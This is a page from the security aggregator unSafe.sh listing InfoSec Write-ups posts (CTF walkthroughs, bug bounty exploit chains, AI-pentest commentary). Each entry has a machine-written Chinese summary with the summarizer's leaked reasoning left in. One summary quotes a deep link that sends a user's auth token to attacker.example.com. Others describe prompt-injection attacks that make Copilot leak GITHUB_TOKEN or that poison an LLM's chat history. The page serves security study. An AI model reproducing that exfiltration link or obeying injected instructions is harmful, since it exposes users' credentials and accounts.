unSafe.sh - 不安全
我的收藏
今日热榜
公众号文章
导航
Github CVE
Github Tools
编码/解码
文件传输
Twitter Bot
Telegram Bot
Search
Rss
黑夜模式
Portswigger Walkthrough Lab: Username enumeration via subtly different responses
嗯,用户让我帮忙总结一篇文章的内容,控制在100字以内,而且不需要特定的开头。我得先仔细看看这篇文章的内容。文章标题是“绕过身份验证”,看起来是关于黑客技术的。作者提到他将展示如何枚举和破解密码,以获得对系统的访问权限,但强调是模拟和道德的方式。 文章里有提到几个步骤:首先进入登录面板,输入无效的用户名和密码;然后将请求发送到Intruder,添加用户名值的位置;使用简单的列表作为载荷类型;粘贴PortSwigger提供的常见用户名;最后检查状态码、长度和渲染情况,但没有成功。 所以,总结的时候需要涵盖这些关键点:绕过身份验证、枚举密码、步骤包括登录尝试、使用工具分析请求、载荷类型、常见用户名列表以及结果未成功。控制在100字以内的话,可能需要简化一些步骤描述。 另外,用户要求直接写描述,不需要“文章内容总结”之类的开头。所以直接用简洁的语言概括整个过程和结果即可。 </think> 文章介绍了一种模拟方式下绕过身份验证的方法,通过枚举常见用户名和密码尝试破解系统访问。作者详细描述了利用工具分析登录请求,设置载荷类型,添加常见用户名列表等步骤,但最终未能成功获取访问权限。...
2026-3-3 06:5:26 | 阅读: 2 |
收藏
|
Bug Bounty in InfoSec Write-ups on Medium - infosecwriteups.com
username
intruder
entered
fellow
sizehello
Portswigger Walkthrough Lab: Username enumeration via subtly different responses
嗯,用户发来了一个请求,让我帮忙总结一篇文章的内容,控制在一百个字以内,而且不需要特定的开头。首先,我需要仔细阅读用户提供的文章内容。 文章看起来是一个技术性的博客或教程,作者在介绍如何绕过身份验证来枚举和破解密码,以获得系统访问权限。这是一个模拟的、道德的方式。文章中提到了几个步骤:进入登录面板输入无效的用户名和密码,将请求发送到Intruder工具中添加用户名位置,使用PortSwigger提供的常见用户名列表作为payload类型,并检查状态码、长度和渲染结果,但没有成功。 接下来,我需要提取关键信息:身份验证绕过、枚举密码、步骤包括登录尝试、使用工具发送请求、添加用户名位置、使用常见用户名列表作为payload,以及结果未成功。这些是主要内容点。 然后,我需要用简洁的语言把这些点浓缩到100字以内。确保不遗漏关键步骤和结果。同时,避免使用“文章内容总结”或“这篇文章”这样的开头词。 可能的结构是:描述作者演示了如何绕过身份验证枚举密码的过程,详细介绍了步骤和工具使用情况,并指出尝试未成功。这样既涵盖了方法又提到了结果。 最后,检查字数是否在限制内,并确保语言流畅自然。 </think> 作者演示了如何通过身份验证绕过技术枚举和破解密码以获取系统访问权限的过程,并详细介绍了具体操作步骤及工具使用情况。...
2026-3-3 06:5:26 | 阅读: 2 |
收藏
|
InfoSec Write-ups - Medium - infosecwriteups.com
username
intruder
rendered
bypasspress
wasting
THM — CupidBot
嗯,用户发来了一段英文文章,让我用中文总结一下内容,控制在100字以内,而且不需要特定的开头。首先,我需要仔细阅读这篇文章,理解它的主要观点。 文章一开始提到这是一个简单的房间,容易解决。接着描述了一个机器人cupidbot,用户可以直接索要旗帜(flags),机器人会直接给出,没有任何安全措施。作者认为这并不像注入攻击,反而太简单了。最后,作者讨论了强化AI提示安全的重要性,并提到了一些优缺点。 接下来,我要总结这些内容。确保在100字以内,并且直接描述文章内容。可能的结构是:介绍房间简单、直接索要flags、机器人给出、讨论安全强化的重要性。 检查是否有遗漏的重要信息,比如作者的观点和建议是否需要提及。最后,确保语言简洁明了。 </think> 这篇文章描述了一个简单的房间场景,在其中可以直接向机器人索要旗帜(flags),机器人会直接提供而无需复杂的操作或注入攻击。文章还讨论了强化AI提示安全的重要性,并指出当前场景过于简单,缺乏深度内容。...
2026-3-3 06:5:9 | 阅读: 5 |
收藏
|
InfoSec Write-ups - Medium - infosecwriteups.com
injection
studies
sizewhy
harden
frankly
An AI That Can Hack Things Autonomously Is Real. The Hype Around It Is Not.
好的,我现在需要帮用户总结一篇关于PentAGI的文章,控制在100字以内。首先,我得仔细阅读用户提供的文章内容,抓住关键点。 文章开头提到PentAGI是一个开源软件,确实令人印象深刻。它需要人类进行设置,配置三个数据库,提供API密钥,定义目标,并且至少需要4GB的内存。除了这些初始设置外,后续不需要人工干预。 接下来,文章讨论了PentAGI的实际用途以及“零人工输入”意味着什么。同时,作者指出网络安全行业不会因为这个GitHub仓库而被完全颠覆,尽管PentAGI确实很出色。文章还提到PentAGI是现有十个AI渗透测试工具中的第四名,并强调了了解实际情况比仅仅关注推文版本更重要。 现在我需要将这些信息浓缩到100字以内。重点包括:PentAGI是开源的、用于渗透测试、需要初始配置和资源、后续无需人工干预、是现有工具之一、不会颠覆行业。 可能会这样组织句子:PentAGI是一个开源的AI渗透测试工具,需要初始配置和资源支持,但之后无需人工干预。尽管功能强大且为现有工具之一,但其影响有限,并未颠覆网络安全行业。 检查一下字数是否在限制内,并确保信息准确传达。 </think> PentAGI 是一个开源的人工智能渗透测试工具,虽然功能强大且无需持续人工干预,但其实际应用仍受限于复杂的初始配置和现有工具的竞争环境。...
2026-3-3 06:4:38 | 阅读: 3 |
收藏
|
InfoSec Write-ups - Medium - infosecwriteups.com
pentagi
tweet
impressive
disrupted
Sunsetnoontide Offsec’s proving ground writeup
嗯,用户让我用中文总结一下这篇文章的内容,控制在一百个字以内。首先,我需要仔细阅读文章内容,抓住关键点。 文章讲的是作者在渗透测试的下一阶段,使用了searchsploit工具从Exploit-DB中查找可能的漏洞。他尝试了Metasploit模块,但发现这个漏洞不可行。于是他通过谷歌找到了另一个网页,成功获得了初始访问权限。接着,在提升权限时,他发现root密码非常弱,直接是“root”,从而成功提权。 现在我要把这些要点浓缩到100字以内。要包括:渗透测试、searchsploit工具、Exploit-DB、Metasploit失败、谷歌找到方法、初始访问、root密码弱、提权成功。 组合起来的话,可以这样写:作者在渗透测试中使用searchsploit查找漏洞,尝试Metasploit模块未果后,通过谷歌找到方法成功获得初始访问权限,并利用弱root密码完成权限提升。 检查一下字数,刚好在限制内。这样总结既全面又简洁。 </think> 作者在渗透测试中使用searchsploit工具查找漏洞,并尝试通过Metasploit模块进行攻击但未成功。随后通过谷歌找到方法并成功获得初始访问权限。最终利用弱root密码完成权限提升。...
2026-3-3 06:2:23 | 阅读: 3 |
收藏
|
InfoSec Write-ups - Medium - infosecwriteups.com
googling
gained
foothold
sizepress
gaining
Turning Threat Intelligence into Bug Bounty Gold: A Practical Workflow
好的,用户让我帮忙总结一篇英文文章,控制在100字以内,而且不需要特定的开头。首先,我需要理解文章的内容。看起来这篇文章讲述的是作者在深夜浏览暗网论坛时,偶然发现了一个安全漏洞,并通过自己的好奇心和一些技术手段,成功找到了一个严重的安全问题,最终获得了漏洞赏金。 接下来,我需要提取关键信息:时间、地点、事件、结果。作者是在凌晨两点左右发现的线索,利用威胁情报和侦察技术发现了配置错误的缓存,导致内部敏感数据泄露。结果是一个美丽的漏洞赏金发现。 然后,我要确保总结控制在100字以内,并且直接描述内容,不使用“文章内容总结”之类的开头。所以我会用简洁的语言概括事件的过程和结果。 最后,检查一下有没有遗漏的重要信息,并确保语言流畅自然。 </think> 深夜浏览暗网论坛时发现线索,通过威胁情报和侦察技术,利用配置错误的缓存,意外发现内部敏感数据泄露,最终收获人生最美妙的漏洞赏金经历。...
2026-3-3 05:54:5 | 阅读: 6 |
收藏
|
Bug Bounty in InfoSec Write-ups on Medium - infosecwriteups.com
night
forums
trouble
scroll
watching
Anatomy of a Cloud Native Attack: How We Pwned Kubernetes for $100k
好的,我现在需要帮用户总结一篇文章的内容,控制在100个字以内。首先,我得仔细阅读用户提供的文章内容,理解其主要信息。 文章主要讲述了一个安全漏洞的利用过程。他们发现了一个SSRF漏洞,利用这个漏洞获取了云实例的元数据凭证。接着,他们通过Kubelet API部署了一个恶意容器,进而获得了服务账户令牌,最终获得了集群的管理员权限。最后,他们负责任地披露了这个漏洞,并获得了10万美元的赏金。 接下来,我需要将这些关键点浓缩到100字以内。要确保涵盖发现漏洞、利用过程、获得权限以及负责任披露这几个方面。同时,语言要简洁明了,避免使用复杂的术语。 可能会遇到的问题是如何在有限的字数内准确传达所有重要信息。因此,我需要选择最核心的步骤和结果来描述整个过程。 最终的总结应该包括:SSRF漏洞、元数据窃取、Kubelet API滥用、获得cluster-admin权限、负责任披露和赏金数额。 现在,把这些点整合成一个连贯的句子结构,确保不超过100字。 </think> 通过发现SSRF漏洞并利用云实例元数据窃取节点凭证,攻击者滥用Kubelet API部署恶意容器并获取Service Account令牌,最终获得cluster-admin权限,并负责任地披露该漏洞以获得10万美元赏金。...
2026-2-27 05:2:39 | 阅读: 10 |
收藏
|
Bug Bounty in InfoSec Write-ups on Medium - infosecwriteups.com
cloud
tiny
ssrf
privileged
payout
Anatomy of a Cloud Native Attack: How We Pwned Kubernetes for $100k
嗯,用户让我用中文总结一篇文章,控制在100字以内,而且不需要特定的开头。首先,我需要仔细阅读文章内容,抓住主要点。文章讲的是一个安全漏洞利用链,从SSRF开始,然后利用EC2实例的元数据凭证,接着通过Kubelet API部署恶意pod,最后获取Service Account token,获得cluster-admin权限,并且负责任地披露漏洞,获得了10万美元的奖励。 好的,用户可能是一位网络安全从业者或者学生,想快速了解文章内容。他们可能需要简洁明了的总结,用于学习或分享。深层需求可能是希望了解漏洞利用的具体步骤和结果,而不仅仅是表面的信息。 接下来,我需要将这些要点浓缩到100字以内。要确保涵盖关键步骤:SSRF、元数据窃取、Kubelet滥用、恶意pod部署、权限提升和负责任披露。同时保持语言流畅自然。 最后检查一下字数和表达是否准确。确保没有遗漏重要信息,并且符合用户的要求。 </think> 研究人员通过发现一个简单的SSRF漏洞,利用云实例元数据窃取凭证,并通过Kubelet API部署恶意pod获取Service Account令牌,最终获得集群管理员权限。漏洞负责任披露后获得10万美元奖励。...
2026-2-27 05:2:39 | 阅读: 5 |
收藏
|
InfoSec Write-ups - Medium - infosecwriteups.com
cloud
privileged
ssrf
tiny
payout
What Hackers Talk About at 2 AM: Using Dark Web Forums for Recon ️
好的,我现在需要帮用户总结这篇文章的内容,控制在100字以内。首先,我得仔细阅读文章,抓住主要信息。 文章开头描述了凌晨两点的情景,开发者还在工作,作者则在浏览一个看起来没更新过的论坛。接着提到一些高危漏洞并非来自工具,而是源于论坛上的闲聊和吹嘘。这说明暗网并非电影中的神秘黑客聚集地,而是混乱且充斥着骗局的地方,但其中也隐藏着真实的情报。 我需要把这些要点浓缩成一句话。重点包括时间点、作者的活动、漏洞来源以及暗网的实际情况。确保语言简洁明了,不使用开头的套话。 最后检查字数,确保不超过100字。这样用户就能快速了解文章的核心内容了。 </think> 凌晨两点,作者在浏览老旧论坛时发现高危漏洞往往源于网络闲聊而非工具;暗网并非神秘黑客聚集地,而是充斥骗局与ego contest的混乱空间,但其中隐藏着真实情报。...
2026-2-27 05:1:14 | 阅读: 10 |
收藏
|
Bug Bounty in InfoSec Write-ups on Medium - infosecwriteups.com
developers
burp
hollywood
chaotic
aiat
What Hackers Talk About at 2 AM: Using Dark Web Forums for Recon ️
好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内。用户已经提供了文章的链接和内容,我先仔细阅读一下。 这篇文章主要讲述了一个开发者的深夜生活,他在凌晨两点还在处理代码问题。同时,他提到在论坛上发现了一些关于暗网的情报,攻击者在这些地方炫耀他们的成果,而这些信息有时甚至比安全工具检测到的还要早。 接下来,我需要提取关键点:开发者的深夜工作、论坛上的暗网情报、攻击者炫耀导致情报泄露。然后将这些内容简洁地整合成一段话,确保不超过100字,并且不使用特定的开头词。 最后检查一下是否涵盖了所有重要信息,并且语言流畅自然。 </think> 开发者凌晨修复代码时,在老旧论坛发现暗网情报,攻击者炫耀导致情报泄露。...
2026-2-27 05:1:14 | 阅读: 4 |
收藏
|
InfoSec Write-ups - Medium - infosecwriteups.com
developers
cold
contests
cheap
pushing
RoguePilot: How a Passive Prompt Injection Led to GitHub Repository Takeovers
嗯,用户让我用中文总结一下这篇文章的内容,控制在一百个字以内,而且不需要以“文章内容总结”或者“这篇文章”这样的开头,直接写描述即可。好的,我先仔细读一下这篇文章。 文章主要讲的是GitHub Codespaces中的一个漏洞,叫做RoguePilot。这个漏洞允许攻击者通过被动提示注入技术,在开发者不知情的情况下劫持整个代码仓库。攻击者利用GitHub Issues中的隐藏指令,让GitHub Copilot执行恶意操作,最终窃取敏感的GITHUB_TOKEN。这个漏洞展示了AI工具集成到开发环境中的潜在安全风险。 接下来,我需要把内容浓缩到100字以内。重点包括:RoguePilot漏洞、被动提示注入、GitHub Copilot被利用、窃取GITHUB_TOKEN、导致仓库被完全控制。同时,还要提到修复措施和未来安全建议。 所以,总结的时候要涵盖这些要点:RoguePilot漏洞通过被动提示注入攻击GitHub Copilot,窃取令牌导致仓库被控制,强调AI工具带来的安全风险。 现在组织语言: 文章描述了GitHub Codespaces中的RoguePilot漏洞,该漏洞利用被动提示注入技术通过GitHub Copilot窃取GITHUB_TOKEN,导致代码仓库被完全控制。这凸显了AI工具集成到开发环境中的安全风险,并强调了加强防御措施的重要性。 检查一下字数:刚好在100字左右。 </think> 文章描述了GitHub Codespaces中的RoguePilot漏洞,该漏洞利用被动提示注入技术通过GitHub Copilot窃取GITHUB_TOKEN,导致代码仓库被完全控制。这凸显了AI工具集成到开发环境中的安全风险,并强调了加强防御措施的重要性。...
2026-2-27 04:59:57 | 阅读: 8 |
收藏
|
InfoSec Write-ups - Medium - infosecwriteups.com
github
copilot
attacker
roguepilot
repository
THM — When Hearts Collide
好的,用户让我帮忙总结一篇文章,控制在100字以内,而且不需要特定的开头。我得先仔细看看这篇文章的内容。 文章主要讲的是RustScan这个工具,它是一个现代的端口扫描器。看起来作者用RustScan扫描了IP地址10.66.179.186,找到了开放的22号和80号端口。22是SSH,版本是OpenSSH 9.6p1;80是HTTP,但文章里没提到具体的服务版本。此外,作者还提到了一些警告信息,比如文件限制可能影响速度,建议使用Docker或者调整ulimit参数。 用户的需求很明确,就是简明扼要地总结内容。我需要抓住关键点:工具名称、扫描目标、发现的端口及服务、版本信息以及警告建议。同时要注意字数限制在100字以内。 现在把这些信息整合一下:RustScan扫描了某个IP,发现了两个开放端口及其服务和版本,并给出了性能优化的建议。这样应该就能满足用户的要求了。 </think> 文章描述了使用RustScan工具扫描IP地址10.66.179.186的过程,发现开放端口22(SSH)和80(HTTP),并提供了警告信息和优化建议。...
2026-2-27 04:58:59 | 阅读: 3 |
收藏
|
InfoSec Write-ups - Medium - infosecwriteups.com
rustscan
179
hearts
186
ulimit
️How Anonymous LDAP Enumeration Led to AS-REP Roasting and Domain Compromise
好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内,并且不需要特定的开头。首先,我得仔细阅读这篇文章,了解它的主要内容和结构。 这篇文章看起来是关于渗透测试的,特别是针对Hack The Box上的Sauna机器。作者详细描述了他如何利用Active Directory的特性进行攻击,包括枚举、AS-REP烤面包攻击、DCSync权限获取以及最终的Pass-the-Hash攻击。他还提到了使用各种工具如nmap、windapsearch、GetNPUsers.py、evil-winrm和BloodHound。 接下来,我需要提炼出关键点:目标机器是一个银行应用,运行在Windows Server上;通过枚举员工名字生成用户名;利用AS-REP烤面包攻击获取密码哈希;通过WinRM访问系统;使用BloodHound分析权限;最终获取管理员权限并拿到flag。 然后,我要把这些点浓缩成一个连贯的句子,确保不超过100字,并且直接描述文章内容,不使用任何特定的开头词。 最后,检查一下是否涵盖了所有主要步骤和工具的使用,确保总结准确且简洁。 </think> 文章描述了一次针对Hack The Box上Sauna机器的渗透测试过程。通过枚举员工名字生成用户名格式,并利用AS-REP烤面包攻击获取用户密码哈希。随后通过WinRM访问系统并上传winPEAS进行本地枚举。发现svc_loanmgr账户后,进一步利用BloodHound分析权限关系,并最终通过DCSync权限获取管理员密码哈希,成功提权并获取目标flag。...
2026-2-27 04:49:27 | 阅读: 8 |
收藏
|
InfoSec Write-ups - Medium - infosecwriteups.com
23t01
egotistical
local2026
commonlib
aclproc
THM — Corp Website
好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内,并且不需要特定的开头。首先,我得仔细阅读用户提供的文章内容,了解其主要信息。 文章看起来像是一个CTF挑战的详细过程。开头提到情人节临近,Romance & Co公司被黑,用户作为安全分析师需要分析攻击过程。接着描述了使用Nmap扫描目标IP,发现开放端口22和3000。然后用FFuf扫描隐藏目录,没找到结果。接着检查源代码和使用的技术,使用Nuclei扫描发现高危漏洞CVE-2025-55184和关键漏洞CVE-2025-55182。 接下来是利用这些漏洞的过程:安装依赖、设置虚拟环境、运行exploit.py脚本获取用户权限,读取user.txt。然后进行权限提升,发现可以sudo运行Python3,最后通过reverse shell获取root权限并读取root.txt。 总结下来,文章描述了一个通过漏洞利用和权限提升来入侵系统的CTF挑战过程。我需要将这些关键点浓缩到100字以内。 首先确定主要步骤:漏洞发现、利用、用户权限获取、权限提升、root权限获取。每个步骤都要简明扼要地表达出来。 可能会用到的关键词:Nmap扫描、隐藏目录、Nuclei漏洞、命令注入、用户flag、sudo Python3、reverse shell、root flag。 现在组织语言:文章描述了一次CTF挑战,参与者通过Nmap和FFuf扫描目标服务器,使用Nuclei发现高危漏洞CVE-2025-55184和CVE-2025-55182。利用这些漏洞进行命令注入,获取用户权限并读取user.txt文件。随后通过sudo运行Python3提升权限,并建立reverse shell获得root访问权限,最终读取root.txt完成挑战。 检查字数是否在100字以内,并确保信息准确无误。 </think> 文章描述了一次CTF挑战中参与者通过扫描目标服务器发现漏洞(CVE-2025-55184和CVE-2025-55182),利用这些漏洞进行命令注入攻击以获取用户权限,并最终通过提权操作获得root访问权限的过程。...
2026-2-27 04:45:13 | 阅读: 16 |
收藏
|
InfoSec Write-ups - Medium - infosecwriteups.com
security
prefetch
x20next
nuclei
woff2
Advent of Cyber Prep Track
嗯,用户让我帮忙总结一下这篇文章的内容,控制在100字以内,而且不需要用“文章内容总结”或者“这篇文章”这样的开头。直接写描述就行。好的,我先看看用户提供的文章内容。 文章是关于THM Cyber Advent 2025的挑战,特别是第一个挑战“密码混乱”。目标是创建一个符合系统检查且不在泄露列表中的密码。步骤包括至少12个字符,包含大小写、数字和符号,并确保不在 breach 数据库中。然后他们遇到了弱密码提示,需要修改。 所以,我需要把这些信息浓缩到100字以内。要涵盖挑战名称、目标、步骤和结果。可能的结构是:挑战名称、目标、步骤要求、遇到的问题和解决方法。 再想想用户可能的需求,他们可能是在准备参加类似的网络安全挑战,或者想了解如何创建强密码。所以总结的时候要突出关键点:密码长度、复杂度要求以及避免使用已泄露的密码。 确保语言简洁明了,直接描述内容,不使用多余的修饰词。比如:“THM Cyber Advent 2025的挑战一‘密码混乱’要求创建一个至少12字符、包含大小写、数字和符号且不在泄露列表中的强密码。” 这样既符合字数限制,又涵盖了所有重要信息。 </think> THM Cyber Advent 2025的挑战一“密码混乱”要求创建一个至少12字符、包含大小写、数字和符号且不在泄露列表中的强密码。...
2026-2-27 04:45:1 | 阅读: 2 |
收藏
|
InfoSec Write-ups - Medium - infosecwriteups.com
advent
sizelet
sizefree
walkthrough
TryHackMe — All-in-One — 00 | Prerequisites
好的,我现在要帮用户总结一篇文章的内容,控制在100字以内。用户的要求很明确,不需要以“文章内容总结”这样的开头,直接写描述即可。 首先,我需要通读整篇文章,抓住主要内容。文章主要讲的是如何在TryHackMe平台上设置稳定的环境来解决挑战。作者使用了免费账户,详细介绍了注册、下载OpenVPN配置、连接到机器的步骤。此外,作者还分享了自己的配置流程,包括使用Windows作为主系统、Kali Linux VM运行工具、Burp Suite代理以及VPS进行SSH隧道连接,以绕过网络限制。 接下来,我要提炼这些信息,确保在100字以内涵盖主要点:注册、OpenVPN连接、配置流程和工具使用。同时,语言要简洁明了,避免冗余。 最后,检查字数是否符合要求,并确保内容准确无误地反映了文章的核心内容。 </think> 文章介绍了在TryHackMe平台上设置稳定环境的方法,包括注册、下载和连接OpenVPN配置、启动机器以及通过代理和SSH隧道访问受限资源的流程。...
2026-2-26 13:41:8 | 阅读: 8 |
收藏
|
InfoSec Write-ups - Medium - infosecwriteups.com
tryhackme
machine
windows
openvpn
burp
Chat History Poisoning in LLM Applications: Persistent Prompt Injection via Untrusted JSON Context
嗯,用户让我总结一篇文章的内容,控制在一百个字以内,而且不需要特定的开头。首先,我需要仔细阅读这篇文章,理解它的主要观点。 文章讨论了大型语言模型(LLM)应用中的一个安全漏洞,叫做“聊天历史中毒”。作者指出,很多应用直接从客户端的JSON请求中获取聊天历史,而不是存储在安全的后端数据库里。这样就给了攻击者机会,他们可以篡改聊天记录,影响模型的行为。 接下来,文章举了一个例子,展示了如何通过修改JSON中的历史字段来插入虚假信息。然后还提到了几种缓解措施,比如将聊天历史存储在安全的数据库中、严格验证请求参数以及遵循OWASP的安全指南。 用户的要求是总结内容,并且控制在100字以内。所以我要抓住关键点:漏洞是什么、攻击方式、影响以及解决方案。 最后,我需要用简洁的语言把这些点整合起来,确保不超过字数限制,并且直接描述内容。 </think> 文章探讨了大型语言模型(LLM)应用中因从不安全的JSON输入获取聊天历史而引发的“聊天历史中毒”漏洞。攻击者可通过篡改JSON中的历史数据操纵LLM行为,例如插入虚假回复或执行受限命令。文章还提供了实验场景和缓解措施建议。...
2026-2-26 13:39:59 | 阅读: 11 |
收藏
|
InfoSec Write-ups - Medium - infosecwriteups.com
llm
security
poisoning
injection
One-Click Account Takeover via Deep Link Token Auto-Append
嗯,这篇文章主要讲的是一个Android应用的漏洞。这个漏洞是通过深链接(deep link)来利用的。深链接允许外部来源打开应用内的特定页面或执行特定操作。文章中提到,这个应用在处理深链接时,没有对URL进行验证,导致攻击者可以构造一个恶意的深链接,让应用在WebView中加载攻击者的URL,并且自动附加上用户的认证令牌。 具体来说,攻击者可以构造一个像`android://Somequickcart?page=webview&objectType=https://attacker.example.com`的链接。当用户点击这个链接时,应用会打开WebView,并加载攻击者的URL。由于应用的设计缺陷,它会自动将用户的认证令牌作为查询参数附加到这个URL上,比如变成`https://attacker.example.com?tmp_param1=AUTH_TOKEN`。 这样,攻击者的服务器就能捕获到用户的认证令牌,从而接管用户的账户。文章还详细分析了漏洞的技术原因,包括深链接处理中没有URL验证、无条件附加认证令牌以及使用查询参数传输令牌这三个关键问题。 最后,文章提出了修复建议,包括在深链接处理中添加严格的URL白名单、有条件地附加认证令牌以及使用HTTP头或POST方法传输令牌等措施。 </think> 这篇文章描述了一个Android应用程序的漏洞,其中恶意构造的深度链接会导致WebView加载攻击者控制的URL,并自动附加用户的认证令牌作为查询参数。这种设计缺陷使得攻击者能够通过简单的点击完成账户接管。...
2026-2-26 13:39:27 | 阅读: 7 |
收藏
|
InfoSec Write-ups - Medium - infosecwriteups.com
attacker
objecttype
param1
objectid
One-Click Account Takeover via Deep Link Token Auto-Append
好的,我需要帮助用户总结这篇文章的内容。用户的要求是用中文总结,控制在100字以内,并且不需要特定的开头。 首先,我快速浏览文章,发现它主要讲的是一个Android应用的安全漏洞。这个漏洞涉及到深度链接(deep links)和WebView组件。 文章提到,攻击者可以通过构造一个特殊的深度链接,让应用打开一个WebView,并自动附加用户的认证令牌。这会导致用户的敏感信息被泄露,从而被攻击者接管账户。 接下来,我需要提取关键点:深度链接的工作原理、漏洞如何被利用、以及攻击的影响。这些内容需要简洁明了地表达出来。 最后,确保总结控制在100字以内,并且语言流畅自然。 </think> 文章描述了一个Android应用的安全漏洞:通过构造恶意深度链接,攻击者可强制应用在WebView中加载任意URL,并自动附加用户的认证令牌作为查询参数。这导致用户敏感信息泄露,攻击者可借此接管账户。...
2026-2-26 13:39:27 | 阅读: 14 |
收藏
|
Bug Bounty in InfoSec Write-ups on Medium - infosecwriteups.com
attacker
objecttype
param1
objectid
InfoSecPrep Box Proving grounds.
好,我现在要帮用户总结这篇文章的内容。首先,我需要仔细阅读文章,理解其主要步骤和结论。 文章讲的是渗透测试的过程,从信息收集开始。作者使用了nmap扫描,发现了两个开放端口:80和SSH。接着,他注意到80端口运行的是WordPress 5.4.2,可能存在漏洞。于是他使用wpscan工具进一步分析,找到了robots.txt文件,并在secrets目录下发现了一个Base64编码的文本。 解码后,他得到了一个OpenSSH私钥。通过设置权限并使用这个私钥,他成功以OSCP用户名SSH登录到目标机器。接下来,为了提升权限,他使用了Linpeas.sh工具,找到了bash和sudo作为提权的可能途径。最终,他成功获得了root权限,并提到了GTFOBins网站作为参考。 现在我需要将这些内容浓缩到100字以内。重点包括:nmap扫描、WordPress漏洞、wpscan工具、Base64解码、SSH登录、提权方法和成功结果。 最后,确保语言简洁明了,不使用任何开头的固定格式。 </think> 文章描述了一次渗透测试过程:通过nmap扫描发现目标机器的开放端口和运行服务(WordPress 5.4.2),利用wpscan工具发现robots.txt文件并获取Base64编码的私钥。解码后获得SSH私钥并成功登录系统。随后通过Linpeas.sh工具寻找提权方法,在bash或sudo配置错误的情况下成功获取root权限。...
2026-2-26 13:39:7 | 阅读: 7 |
收藏
|
InfoSec Write-ups - Medium - infosecwriteups.com
ssh
gathering
robots
sizefound
machine
Previous
9
10
11
12
13
14
15
16
Next